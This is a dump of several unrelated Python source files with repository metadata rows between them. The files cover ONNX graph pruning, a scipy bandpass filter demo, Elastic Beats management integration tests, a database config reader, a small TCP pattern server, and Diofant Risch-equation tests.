outputs = [output.name for output in self.model.graph.output]
output_name_to_node = self.output_name_to_node()
all_nodes = []
for output in outputs:
if output in output_name_to_node:
last_node = output_name_to_node[output]
if last_node in all_nodes:
continue
nodes = self.get_parent_subgraph_nodes(last_node, [])
all_nodes.append(last_node)
all_nodes.extend(nodes)
nodes_to_remove = []
for node in self.model.graph.node:
if node not in all_nodes:
nodes_to_remove.append(node)
self.remove_nodes(nodes_to_remove)
# remove outputs not in list
output_to_remove = []
for output in self.model.graph.output:
if output.name not in outputs:
output_to_remove.append(output)
for output in output_to_remove:
self.model.graph.output.remove(output)
# remove inputs not used by any node.
input_name_to_nodes = self.input_name_to_nodes()
input_to_remove = []
for input in self.model.graph.input:
if input.name not in input_name_to_nodes:
input_to_remove.append(input)
for input in input_to_remove:
self.model.graph.input.remove(input)
logger.info("Graph pruned: {} inputs, {} outputs and {} nodes are removed".format(
len(input_to_remove), len(output_to_remove), len(nodes_to_remove)))
self.update_graph()
def update_graph(self, verbose=False):
graph = self.model.graph
remaining_input_names = []
for node in graph.node:
if node.op_type != "Constant":
for input_name in node.input:
if input_name not in remaining_input_names:
remaining_input_names.append(input_name)
if verbose:
logger.debug(f"remaining input names: {remaining_input_names}")
# remove graph input that is not used
inputs_to_remove = []
for input in graph.input:
if input.name not in remaining_input_names:
inputs_to_remove.append(input)
for input in inputs_to_remove:
graph.input.remove(input)
names_to_remove = [input.name for input in inputs_to_remove]
logger.debug(f"remove {len(inputs_to_remove)} unused inputs: {names_to_remove}")
# remove weights that are not used
weights_to_remove = []
weights_to_keep = []
for initializer in graph.initializer:
if initializer.name not in remaining_input_names and not self.find_graph_output(initializer.name):
weights_to_remove.append(initializer)
else:
weights_to_keep.append(initializer.name)
for initializer in weights_to_remove:
graph.initializer.remove(initializer)
names_to_remove = [initializer.name for initializer in weights_to_remove]
logger.debug(f"remove {len(weights_to_remove)} unused initializers: {names_to_remove}")
if verbose:
logger.debug(f"remaining initializers:{weights_to_keep}")
self.remove_unused_constant()
def is_safe_to_fuse_nodes(self, nodes_to_remove, keep_outputs, input_name_to_nodes, output_name_to_node):
for node_to_remove in nodes_to_remove:
for output_to_remove in node_to_remove.output:
if output_to_remove in keep_outputs:
continue
if output_to_remove in input_name_to_nodes:
for impacted_node in input_name_to_nodes[output_to_remove]:
if impacted_node not in nodes_to_remove:
logger.debug(
f"it is not safe to remove nodes since output {output_to_remove} is used by {impacted_node}"
)
return False
return True
def save_model_to_file(self, output_path, use_external_data_format=False):
logger.info(f"Output model to {output_path}")
Path(output_path).parent.mkdir(parents=True, exist_ok=True)
if output_path.endswith(".json"): # Output text for testing small model.
assert isinstance(self.model, ModelProto)
with open(output_path, "w") as out:
out.write(str(self.model))
else:
# Save model to external data, which is needed for model size > 2GB
if use_external_data_format:
data_file = str(Path(output_path).name + ".data")
if os.path.isfile(data_file):
os.remove(data_file)
external_data_helper.convert_model_to_external_data(self.model,
all_tensors_to_one_file=True,
location=data_file)
save_model(self.model, output_path)
def get_graph_inputs_excluding_initializers(self):
"""
Returns real graph inputs (excluding initializers from older onnx model).
"""
graph_inputs = []
for input in self.model.graph.input:
if self.get_initializer(input.name) is None:
graph_inputs.append(input)
return graph_inputs
| 40.12931
| 156
| 0.603688
|
1bba1b68a51a790a840ea314035b2bdbdf0ddc35
| 1,978
|
py
|
Python
|
pyFilter.py
|
bjohnson751/Body-Brain-Fusion-
|
d4b657aca6d1b465fdbcb09368241b7273fd4acf
|
[
"MIT"
] | null | null | null |
pyFilter.py
|
bjohnson751/Body-Brain-Fusion-
|
d4b657aca6d1b465fdbcb09368241b7273fd4acf
|
[
"MIT"
] | null | null | null |
pyFilter.py
|
bjohnson751/Body-Brain-Fusion-
|
d4b657aca6d1b465fdbcb09368241b7273fd4acf
|
[
"MIT"
] | null | null | null |
from scipy.signal import butter, lfilter
def butter_bandpass(lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = butter(order, [low, high], btype='band')
return b, a
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5):
b, a = butter_bandpass(lowcut, highcut, fs, order=order)
y = lfilter(b, a, data)
return y
if __name__ == "__main__":
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import freqz
# Sample rate and desired cutoff frequencies (in Hz).
fs = 5000.0
lowcut = 500.0
highcut = 1250.0
# Plot the frequency response for a few different orders.
plt.figure(1)
plt.clf()
for order in [3, 6, 9]:
b, a = butter_bandpass(lowcut, highcut, fs, order=order)
w, h = freqz(b, a, worN=2000)
plt.plot((fs * 0.5 / np.pi) * w, abs(h), label="order = %d" % order)
plt.plot([0, 0.5 * fs], [np.sqrt(0.5), np.sqrt(0.5)],
'--', label='sqrt(0.5)')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Gain')
plt.grid(True)
plt.legend(loc='best')
# Filter a noisy signal.
T = 0.05
nsamples = T * fs
t = np.linspace(0, T, nsamples, endpoint=False)
a = 0.02
f0 = 600.0
x = 0.1 * np.sin(2 * np.pi * 1.2 * np.sqrt(t))
x += 0.01 * np.cos(2 * np.pi * 312 * t + 0.1)
x += a * np.cos(2 * np.pi * f0 * t + .11)
x += 0.03 * np.cos(2 * np.pi * 2000 * t)
plt.figure(2)
plt.clf()
plt.plot(t, x, label='Noisy signal')
y = butter_bandpass_filter(x, lowcut, highcut, fs, order=6)
plt.plot(t, y, label='Filtered signal (%g Hz)' % f0)
plt.xlabel('time (seconds)')
plt.hlines([-a, a], 0, T, linestyles='--')
plt.grid(True)
plt.axis('tight')
plt.legend(loc='upper left')
plt.show()
| 32.42623
| 79
| 0.530334
|
35a4f9949f9f43fdeded79aaf9c9f8b9b81cb7b7
| 10,247
|
py
|
Python
|
x-pack/libbeat/tests/system/test_management.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-11-17T06:29:30.000Z
|
2021-08-08T11:56:01.000Z
|
x-pack/libbeat/tests/system/test_management.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 36
|
2021-02-02T14:18:40.000Z
|
2022-03-20T15:07:30.000Z
|
x-pack/libbeat/tests/system/test_management.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2021-03-10T05:38:32.000Z
|
2021-08-16T13:11:19.000Z
|
import sys
import os
import glob
import json
import requests
import string
import random
import unittest
import time
from elasticsearch import Elasticsearch
from os import path
from base import BaseTest
# Disable because waiting artifacts from https://github.com/elastic/kibana/pull/31660
INTEGRATION_TESTS = os.environ.get('INTEGRATION_TESTS', False)
# INTEGRATION_TESTS = False
TIMEOUT = 2 * 60
class TestManagement(BaseTest):
def setUp(self):
super(TestManagement, self).setUp()
# NOTES: Theses options are linked to the specific of the docker compose environment for
# CM.
self.es_host = os.getenv('ES_HOST', 'localhost') + ":" + os.getenv('ES_POST', '9200')
self.es_user = "myelastic"
self.es_pass = "changeme"
self.es = Elasticsearch([self.get_elasticsearch_url()], verify_certs=True)
self.keystore_path = self.working_dir + "/data/keystore"
if path.exists(self.keystore_path):
os.Remove(self.keystore_path)
@unittest.skipIf(not INTEGRATION_TESTS,
"integration tests are disabled, run with INTEGRATION_TESTS=1 to enable them.")
def test_enroll(self):
"""
Enroll the beat in Kibana Central Management
"""
assert len(glob.glob(os.path.join(self.working_dir, "mockbeat.yml.*.bak"))) == 0
# We don't care about this as it will be replaced by enrollment
# process:
config_path = os.path.join(self.working_dir, "mockbeat.yml")
self.render_config_template("mockbeat", config_path, keystore_path=self.keystore_path)
config_content = open(config_path, 'r').read()
exit_code = self.enroll(self.es_user, self.es_pass)
assert exit_code == 0
assert self.log_contains("Enrolled and ready to retrieve settings")
# Enroll creates a keystore (to store access token)
assert os.path.isfile(os.path.join(
self.working_dir, "data/keystore"))
# New settings file is in place now
new_content = open(config_path, 'r').read()
assert config_content != new_content
# Settings backup has been created
backup_file = glob.glob(os.path.join(self.working_dir, "mockbeat.yml.*.bak"))[0]
assert os.path.isfile(backup_file)
backup_content = open(backup_file).read()
assert config_content == backup_content
@unittest.skipIf(not INTEGRATION_TESTS,
"integration tests are disabled, run with INTEGRATION_TESTS=1 to enable them.")
def test_enroll_bad_pw(self):
"""
Try to enroll the beat in Kibana Central Management with a bad password
"""
# We don't care about this as it will be replaced by enrollment
# process:
config_path = os.path.join(self.working_dir, "mockbeat.yml")
self.render_config_template("mockbeat", config_path, keystore_path=self.keystore_path)
config_content = open(config_path, 'r').read()
exit_code = self.enroll("not", 'wrong password')
assert exit_code == 1
# Keystore wasn't created
assert not os.path.isfile(os.path.join(
self.working_dir, "data/keystore"))
# Settings hasn't changed
new_content = open(config_path, 'r').read()
assert config_content == new_content
@unittest.skipIf(not INTEGRATION_TESTS,
"integration tests are disabled, run with INTEGRATION_TESTS=1 to enable them.")
def test_fetch_configs(self):
"""
Config is retrieved from Central Management and updates are applied
"""
# Enroll the beat
config_path = os.path.join(self.working_dir, "mockbeat.yml")
self.render_config_template("mockbeat", config_path, keystore_path=self.keystore_path)
exit_code = self.enroll(self.es_user, self.es_pass)
assert exit_code == 0
index = self.random_index()
# Configure an output
self.create_and_assing_tag([
{
"type": "output",
"config": {
"_sub_type": "elasticsearch",
"hosts": [self.es_host],
"username": self.es_user,
"password": self.es_pass,
"index": index,
},
"id": "myconfig",
}
])
# Start beat
proc = self.start_beat(extra_args=[
"-E", "management.period=1s",
"-E", "keystore.path=%s" % self.keystore_path,
])
# Wait for beat to apply new conf
self.wait_log_contains("Applying settings for output")
self.wait_until(lambda: self.log_contains("PublishEvents: "), max_timeout=TIMEOUT)
self.wait_documents(index, 1)
index2 = self.random_index()
# Update output configuration
self.create_and_assing_tag([
{
"type": "output",
"config": {
"_sub_type": "elasticsearch",
"hosts": [self.es_host],
"username": self.es_user,
"password": self.es_pass,
"index": index2,
},
"id": "myconfig",
}
])
self.wait_log_contains("Applying settings for output")
self.wait_until(lambda: self.log_contains("PublishEvents: "), max_timeout=TIMEOUT)
self.wait_documents(index2, 1)
proc.check_kill_and_wait()
@unittest.skipIf(not INTEGRATION_TESTS,
"integration tests are disabled, run with INTEGRATION_TESTS=1 to enable them.")
def test_configs_cache(self):
"""
Config cache is used if Kibana is not available
"""
# Enroll the beat
config_path = os.path.join(self.working_dir, "mockbeat.yml")
self.render_config_template("mockbeat", config_path, keystore_path=self.keystore_path)
exit_code = self.enroll(self.es_user, self.es_pass)
assert exit_code == 0
index = self.random_index()
# Update output configuration
self.create_and_assing_tag([
{
"type": "output",
"config": {
"_sub_type": "elasticsearch",
"hosts": [self.es_host],
"username": self.es_user,
"password": self.es_pass,
"index": index,
}
}
])
# Start beat
proc = self.start_beat(extra_args=[
"-E", "management.period=1s",
"-E", "keystore.path=%s" % self.keystore_path,
])
self.wait_until(lambda: self.log_contains("PublishEvents: "), max_timeout=TIMEOUT)
self.wait_documents(index, 1)
proc.check_kill_and_wait()
# Remove the index
self.es.indices.delete(index)
# Cache should exists already, start with wrong kibana settings:
proc = self.start_beat(extra_args=[
"-E", "management.period=1s",
"-E", "management.kibana.host=wronghost",
"-E", "management.kibana.timeout=0.5s",
"-E", "keystore.path=%s" % self.keystore_path,
])
self.wait_until(lambda: self.log_contains("PublishEvents: "), max_timeout=TIMEOUT)
self.wait_documents(index, 1)
proc.check_kill_and_wait()
def enroll(self, user, password):
return self.run_beat(
extra_args=["enroll", self.get_kibana_url(),
"--password", "env:PASS", "--username", user, "--force"],
logging_args=["-v", "-d", "*"],
env={
'PASS': password,
})
def check_kibana_status(self):
headers = {
"kbn-xsrf": "1"
}
# Create tag
url = self.get_kibana_url() + "/api/status"
r = requests.get(url, headers=headers,
auth=(self.es_user, self.es_pass))
def create_and_assing_tag(self, blocks):
tag_name = "test%d" % int(time.time() * 1000)
headers = {
"kbn-xsrf": "1"
}
# Create tag
url = self.get_kibana_url() + "/api/beats/tag/" + tag_name
data = {
"color": "#DD0A73",
"name": tag_name,
}
r = requests.put(url, json=data, headers=headers,
auth=(self.es_user, self.es_pass))
assert r.status_code in (200, 201)
# Create blocks
url = self.get_kibana_url() + "/api/beats/configurations"
for b in blocks:
b["tag"] = tag_name
r = requests.put(url, json=blocks, headers=headers,
auth=(self.es_user, self.es_pass))
assert r.status_code in (200, 201)
# Retrieve beat ID
meta = json.loads(
open(os.path.join(self.working_dir, 'data', 'meta.json'), 'r').read())
# Assign tag to beat
data = {"assignments": [{"beatId": meta["uuid"], "tag": tag_name}]}
url = self.get_kibana_url() + "/api/beats/agents_tags/assignments"
r = requests.post(url, json=data, headers=headers,
auth=(self.es_user, self.es_pass))
assert r.status_code == 200
def get_elasticsearch_url(self):
return 'http://' + self.es_user + ":" + self.es_pass + '@' + \
os.getenv('ES_HOST', 'localhost') + ':' + os.getenv('ES_PORT', '5601')
def get_kibana_url(self):
return 'http://' + os.getenv('KIBANA_HOST', 'kibana') + ':' + os.getenv('KIBANA_PORT', '5601')
def random_index(self):
return ''.join(random.choice(string.ascii_lowercase) for i in range(10))
def check_document_count(self, index, count):
try:
self.es.indices.refresh(index=index)
return self.es.search(index=index, body={"query": {"match_all": {}}})['hits']['total']['value'] >= count
except BaseException:
return False
def wait_documents(self, index, count):
self.wait_until(lambda: self.check_document_count(index, count), max_timeout=TIMEOUT, poll_interval=1)
| 35.092466
| 116
| 0.57812
|
a93a3d2f31d4cc39dfd563c251ac7c120cffe598
| 6,739
|
py
|
Python
|
configuration/configuration_data.py
|
diogo1790team/inphinity_DM
|
b20d75ee0485e1f406a25efcf5f2855631166c38
|
[
"MIT"
] | 1
|
2019-03-11T12:59:37.000Z
|
2019-03-11T12:59:37.000Z
|
configuration/configuration_data.py
|
diogo1790team/inphinity_DM
|
b20d75ee0485e1f406a25efcf5f2855631166c38
|
[
"MIT"
] | 21
|
2018-10-17T14:52:30.000Z
|
2019-06-03T12:43:58.000Z
|
configuration/configuration_data.py
|
diogo1790team/inphinity_DM
|
b20d75ee0485e1f406a25efcf5f2855631166c38
|
[
"MIT"
] | 6
|
2019-02-28T07:40:14.000Z
|
2019-09-23T13:31:54.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 26 08:26:09 2018
@author: Diogo
"""
import configparser
from pathlib import Path
import os
class Configuration_data:
"""
This class is called when we need to insert values in the database to select it
"""
def __init__(self, db_name = "INPHINTY"):
"""
Constructor of the object of configuration. if any configuration file exists, it always used the "interal" database
:param db_name: name of the database (INPHINITY, DOMINE,...) accoding these in mySQL
:type db_name: text - required
"""
self.db_name = db_name
self.host_ip = ""
self.usr_name = ""
self.pwd_db = ""
def check_config_file(self):
"""
This method check if a configuration file exists and return it.
:return: configparser object if exist or None in case of no
:rtype configparser object
"""
complete_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', 'configuration'))
config_file = Path(complete_path + '/database_config.ini')
if config_file.is_file():
config = configparser.ConfigParser()
config.read(complete_path + '/database_config.ini')
return config
else:
print('No configuration file, db inside is considered')
return None
def get_inphinity_db(self):
"""
This method return the INPHINTY database nam used
:return: name of the database inphinity
:rtype string
"""
database_name = 'INPH_proj'
config = self.check_config_file()
if config != None:
database_name = config['DATABASE']['name_database_inphinity']
return database_name
def get_domine_db(self):
"""
This method return the DOMINE database nam used
:return: name of the database DOMINE
:rtype string
"""
database_name = 'domine_db_out'
config = self.check_config_file()
if config != None:
database_name = config['DATABASE']['name_database_domine']
return database_name
def get_3did_db(self):
"""
This method return the 3did database nam used
:return: name of the database 3did
:rtype string
"""
database_name = '3did_db_out'
config = self.check_config_file()
if config != None:
database_name = config['DATABASE']['name_database_3did']
return database_name
def get_iPFAM_db(self):
"""
This method return the 3did database nam used
:return: name of the database 3did
:rtype string
"""
database_name = 'pfam_db_out'
config = self.check_config_file()
if config != None:
database_name = config['DATABASE']['name_database_iPFAM']
return database_name
def get_db_type(self):
"""
This method return the type of database used
Typically: 0 = mysql and 1 = postgresql
:return: type of database used
:rtype int
"""
id_db_used = -1
config = self.check_config_file()
if config != None:
id_db_used = config['CONFIG_ACCESS']['db_access']
return int(id_db_used)
def get_db_access(self):
"""
This method return the tags used to obtain the database access data and if it is from the server or local
Typically DB: 0 = mysql, 1 = postgresql
Typically connection: 0 = inside, 1 = outside
:return: list[tag_host, tag_user, tag_pwd]
:rtype list[]
"""
type_database = -1
type_connection = -1
list_tags_db_access = []
config = self.check_config_file()
if config != None:
type_database = self.get_db_type()
type_connection = config['CONFIG_ACCESS']['db_connection']
if type_connection == 0:
list_tags_db_access.append('host_inside_trex')
else:
list_tags_db_access.append('host_outside_trex')
if type_database == 0:
list_tags_db_access.extend(('usr_mysql','pwd_mysql'))
else:
list_tags_db_access.extend(('usr_postgres','pwd_postgres'))
return list_tags_db_access
def get_host_ip(self, connection_location_tag):
"""
This method return the host ip used for the connection (typically inside or outside)
:param connection_location_tag: tag in the .ini file to obtain the IP
:type connection_location_tag: string - mandatory
:return: host adresse
:rtype string
"""
host_ip = ""
config = self.check_config_file()
if config != None:
host_ip = config['HOST'][connection_location_tag]
return host_ip
def get_user_data(self, usr_db, pwd_db):
"""
This method return the connection data used to perform the login
:param usr_db: tag in the .ini file to obtain the username
:param pwd_db: tag in the .ini file to obtain the pwd
:type usr_db: string - mandatory
:type pwd_db: string - mandatory
:return: list[username, pwd]
:rtype list[]
"""
data_connection = []
config = self.check_config_file()
if config != None:
data_connection.append(config['USER'][usr_db])
data_connection.append(config['PWD'][pwd_db])
return data_connection
def get_database_name(self):
"""
Return the name of the database according the ini file
:return: name of the database
:rtype string object
"""
database_name = ""
if self.db_name is 'INPHINITY':
database_name = self.get_inphinity_db()
if self.db_name is 'DOMINE':
database_name = self.get_domine_db()
if self.db_name is '3DID':
database_name = self.get_3did_db()
if self.db_name is 'iPFAM':
database_name = self.get_iPFAM_db()
return database_name
def get_database_connection_information(self):
"""
Return the data necessary for the database connection
:return: list[host, user, pwd, db_name]
:rtype list[]
"""
db_data_access = []
database_name = self.get_database_name()
list_accessdb = self.get_db_access()
host_ip = self.get_host_ip(list_accessdb[0])
user_pwd = self.get_user_data(list_accessdb[1], list_accessdb[2])
db_data_access = [database_name, host_ip, user_pwd[0], user_pwd[1]]
assert len(db_data_access) == 4
return db_data_access
| 29.687225
| 123
| 0.606173
|
96091e8a61d970add8582fd633b0d5c494e20d58
| 762
|
py
|
Python
|
python/pattern_server/pattern_server.py
|
multispot-software/LCOS_LabVIEW
|
bbf5653203bb734d1d2d1b31c7f65f309545de7a
|
[
"MIT"
] | null | null | null |
python/pattern_server/pattern_server.py
|
multispot-software/LCOS_LabVIEW
|
bbf5653203bb734d1d2d1b31c7f65f309545de7a
|
[
"MIT"
] | null | null | null |
python/pattern_server/pattern_server.py
|
multispot-software/LCOS_LabVIEW
|
bbf5653203bb734d1d2d1b31c7f65f309545de7a
|
[
"MIT"
] | 3
|
2018-10-30T21:06:20.000Z
|
2020-03-27T08:14:41.000Z
|
#! python3
import socketserver
import yaml
from patternlib import compute_pattern
def process_recv_data(data):
#print(data)
params = yaml.load(data)
print(params, end='\n\n')
a = compute_pattern(**params)
return a.tobytes()
class MyTCPHandler(socketserver.BaseRequestHandler):
def handle(self):
# self.request is the TCP socket connected to the client
self.data = self.request.recv(1024).strip()
print("- Data received.")
response = process_recv_data(self.data)
self.request.sendall(response)
def main():
HOST, PORT = "localhost", 9999
server = socketserver.TCPServer((HOST, PORT), MyTCPHandler)
print('Serving...')
server.serve_forever()
if __name__ == "__main__":
main()
| 25.4
| 64
| 0.674541
|
65c53b27289fd5871d29010d2829ae92d255bf4d
| 9,467
|
py
|
Python
|
diofant/tests/integrals/test_rde.py
|
rajkk1/diofant
|
6b361334569e4ec2e8c7d30dc324387a4ad417c2
|
[
"BSD-3-Clause"
] | 57
|
2016-09-13T23:16:26.000Z
|
2022-03-29T06:45:51.000Z
|
diofant/tests/integrals/test_rde.py
|
rajkk1/diofant
|
6b361334569e4ec2e8c7d30dc324387a4ad417c2
|
[
"BSD-3-Clause"
] | 402
|
2016-05-11T11:11:47.000Z
|
2022-03-31T14:27:02.000Z
|
diofant/tests/integrals/test_rde.py
|
rajkk1/diofant
|
6b361334569e4ec2e8c7d30dc324387a4ad417c2
|
[
"BSD-3-Clause"
] | 20
|
2016-05-11T08:17:37.000Z
|
2021-09-10T09:15:51.000Z
|
"""Most of these tests come from the examples in Bronstein's book."""
import pytest
from diofant import I, Poly, Rational, oo, symbols
from diofant.abc import k, n, t, x, z
from diofant.integrals.rde import (bound_degree, cancel_exp, cancel_primitive,
no_cancel_equal, normal_denom, order_at,
order_at_oo, rischDE, solve_poly_rde, spde,
special_denom, weak_normalizer)
from diofant.integrals.risch import (DifferentialExtension,
NonElementaryIntegralException)
__all__ = ()
t0, t1, t2 = symbols('t:3')
def test_order_at():
a = Poly(t**4, t)
b = Poly((t**2 + 1)**3*t, t)
c = Poly((t**2 + 1)**6*t, t)
d = Poly((t**2 + 1)**10*t**10, t)
e = Poly((t**2 + 1)**100*t**37, t)
p1 = Poly(t, t)
p2 = Poly(1 + t**2, t)
assert order_at(a, p1, t) == 4
assert order_at(b, p1, t) == 1
assert order_at(c, p1, t) == 1
assert order_at(d, p1, t) == 10
assert order_at(e, p1, t) == 37
assert order_at(a, p2, t) == 0
assert order_at(b, p2, t) == 3
assert order_at(c, p2, t) == 6
assert order_at(d, p1, t) == 10
assert order_at(e, p2, t) == 100
assert order_at(Poly(0, t), Poly(t, t), t) == oo
assert order_at_oo(Poly(t**2 - 1, t), Poly(t + 1), t) == \
order_at_oo(Poly(t - 1, t), Poly(1, t), t) == -1
assert order_at_oo(Poly(0, t), Poly(1, t), t) == oo
def test_weak_normalizer():
a = Poly((1 + x)*t**5 + 4*t**4 + (-1 - 3*x)*t**3 - 4*t**2 + (-2 + 2*x)*t, t)
d = Poly(t**4 - 3*t**2 + 2, t)
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
r = weak_normalizer(a, d, DE, z)
assert r == (Poly(t**5 - t**4 - 4*t**3 + 4*t**2 + 4*t - 4, t),
(Poly((1 + x)*t**2 + x*t, t), Poly(t + 1, t)))
assert weak_normalizer(r[1][0], r[1][1], DE) == (Poly(1, t), r[1])
r = weak_normalizer(Poly(1 + t**2), Poly(t**2 - 1, t), DE, z)
assert r == (Poly(t**4 - 2*t**2 + 1, t), (Poly(-3*t**2 + 1, t), Poly(t**2 - 1, t)))
assert weak_normalizer(r[1][0], r[1][1], DE, z) == (Poly(1, t), r[1])
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1 + t**2)]})
r = weak_normalizer(Poly(1 + t**2), Poly(t, t), DE, z)
assert r == (Poly(t, t), (Poly(0, t), Poly(1, t)))
assert weak_normalizer(r[1][0], r[1][1], DE, z) == (Poly(1, t), r[1])
def test_normal_denom():
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
pytest.raises(NonElementaryIntegralException, lambda: normal_denom(Poly(1, x), Poly(1, x),
Poly(1, x), Poly(x, x), DE))
fa, fd = Poly(t**2 + 1, t), Poly(1, t)
ga, gd = Poly(1, t), Poly(t**2, t)
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
assert normal_denom(fa, fd, ga, gd, DE) == \
(Poly(t, t), (Poly(t**3 - t**2 + t - 1, t), Poly(1, t)), (Poly(1, t),
Poly(1, t)), Poly(t, t))
def test_special_denom():
# TODO: add more tests here
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
assert special_denom(Poly(1, t), Poly(t**2, t), Poly(1, t), Poly(t**2 - 1, t),
Poly(t, t), DE) == \
(Poly(1, t), Poly(t**2 - 1, t), Poly(t**2 - 1, t), Poly(t, t))
# assert special_denom(Poly(1, t), Poly(2*x, t), Poly((1 + 2*x)*t, t), DE) == 1
# issue sympy/sympy#3940
# Note, this isn't a very good test, because the denominator is just 1,
# but at least it tests the exp cancellation case
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(-2*x*t0, t0),
Poly(I*k*t1, t1)]})
DE.decrement_level()
assert special_denom(Poly(1, t0), Poly(I*k, t0), Poly(1, t0), Poly(t0, t0),
Poly(1, t0), DE) == \
(Poly(1, t0), Poly(I*k, t0), Poly(t0, t0), Poly(1, t0))
@pytest.mark.xfail
def test_bound_degree_fail():
# Primitive
DE = DifferentialExtension(extension={'D': [Poly(1, x),
Poly(t0/x**2, t0), Poly(1/x, t)]})
assert bound_degree(Poly(t**2, t), Poly(-(1/x**2*t**2 + 1/x), t),
Poly((2*x - 1)*t**4 + (t0 + x)/x*t**3 - (t0 + 4*x**2)/2*x*t**2 + x*t,
t), DE) == 3
def test_bound_degree():
# Base
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
assert bound_degree(Poly(1, x), Poly(-2*x, x), Poly(1, x), DE) == 0
# Primitive (see above test_bound_degree_fail)
# TODO: Add test for when the degree bound becomes larger after limited_integrate
# TODO: Add test for db == da - 1 case
# Exp
# TODO: Add tests
# TODO: Add test for when the degree becomes larger after parametric_log_deriv()
# Nonlinear
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
assert bound_degree(Poly(t, t), Poly((t - 1)*(t**2 + 1), t), Poly(1, t), DE) == 0
def test_spde():
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
pytest.raises(NonElementaryIntegralException, lambda: spde(Poly(t, t), Poly((t - 1)*(t**2 + 1), t), Poly(1, t), 0, DE))
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
assert spde(Poly(t**2 + x*t*2 + x**2, t), Poly(t**2/x**2 + (2/x - 1)*t, t),
Poly(t**2/x**2 + (2/x - 1)*t, t), 0, DE) == \
(Poly(0, t), Poly(0, t), 0, Poly(0, t), Poly(1, t))
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t0/x**2, t0), Poly(1/x, t)]})
assert spde(Poly(t**2, t), Poly(-t**2/x**2 - 1/x, t),
Poly((2*x - 1)*t**4 + (t0 + x)/x*t**3 - (t0 + 4*x**2)/(2*x)*t**2 + x*t, t), 3, DE) == \
(Poly(0, t), Poly(0, t), 0, Poly(0, t),
Poly(t0*t**2/2 + x**2*t**2 - x**2*t, t))
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
assert spde(Poly(x**2 + x + 1, x), Poly(-2*x - 1, x), Poly(x**5/2 +
3*x**4/4 + x**3 - x**2 + 1, x), 4, DE) == \
(Poly(0, x), Poly(x/2 - Rational(1, 4), x), 2, Poly(x**2 + x + 1, x), Poly(5*x/4, x))
assert spde(Poly(x**2 + x + 1, x), Poly(-2*x - 1, x), Poly(x**5/2 +
3*x**4/4 + x**3 - x**2 + 1, x), n, DE) == \
(Poly(0, x), Poly(x/2 - Rational(1, 4), x), -2 + n, Poly(x**2 + x + 1, x), Poly(5*x/4, x))
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1, t)]})
pytest.raises(NonElementaryIntegralException, lambda: spde(Poly((t - 1)*(t**2 + 1)**2, t), Poly((t - 1)*(t**2 + 1), t), Poly(1, t), 0, DE))
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
assert spde(Poly(x**2 - x, x), Poly(1, x), Poly(9*x**4 - 10*x**3 + 2*x**2, x), 4, DE) == (Poly(0, x), Poly(0, x), 0, Poly(0, x), Poly(3*x**3 - 2*x**2, x))
assert spde(Poly(x**2 - x, x), Poly(x**2 - 5*x + 3, x), Poly(x**7 - x**6 - 2*x**4 + 3*x**3 - x**2, x), 5, DE) == \
(Poly(1, x), Poly(x + 1, x), 1, Poly(x**4 - x**3, x), Poly(x**3 - x**2, x))
def test_solve_poly_rde_no_cancel():
# deg(b) large
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1 + t**2, t)]})
assert solve_poly_rde(Poly(t**2 + 1, t), Poly(t**3 + (x + 1)*t**2 + t + x + 2, t),
oo, DE) == Poly(t + x, t)
# deg(b) small
DE = DifferentialExtension(extension={'D': [Poly(1, x)]})
assert solve_poly_rde(Poly(0, x), Poly(x/2 - Rational(1, 4), x), oo, DE) == \
Poly(x**2/4 - x/4, x)
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
assert solve_poly_rde(Poly(2, t), Poly(t**2 + 2*t + 3, t), 1, DE) == \
Poly(t + 1, t, x)
# deg(b) == deg(D) - 1
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**2 + 1, t)]})
assert no_cancel_equal(Poly(1 - t, t),
Poly(t**3 + t**2 - 2*x*t - 2*x, t), oo, DE) == \
(Poly(t**2, t), 1, Poly((-2 - 2*x)*t - 2*x, t))
def test_solve_poly_rde_cancel():
# exp
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})
assert cancel_exp(Poly(2*x, t), Poly(2*x, t), 0, DE) == \
Poly(1, t)
assert cancel_exp(Poly(2*x, t), Poly((1 + 2*x)*t, t), 1, DE) == \
Poly(t, t)
# TODO: Add more exp tests, including tests that require is_deriv_in_field()
# primitive
DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})
# If the DecrementLevel context manager is working correctly, this shouldn't
# cause any problems with the further tests.
pytest.raises(NonElementaryIntegralException, lambda: cancel_primitive(Poly(1, t), Poly(t, t), oo, DE))
assert cancel_primitive(Poly(1, t), Poly(t + 1/x, t), 2, DE) == \
Poly(t, t)
assert cancel_primitive(Poly(4*x, t), Poly(4*x*t**2 + 2*t/x, t), 3, DE) == \
Poly(t**2, t)
# TODO: Add more primitive tests, including tests that require is_deriv_in_field()
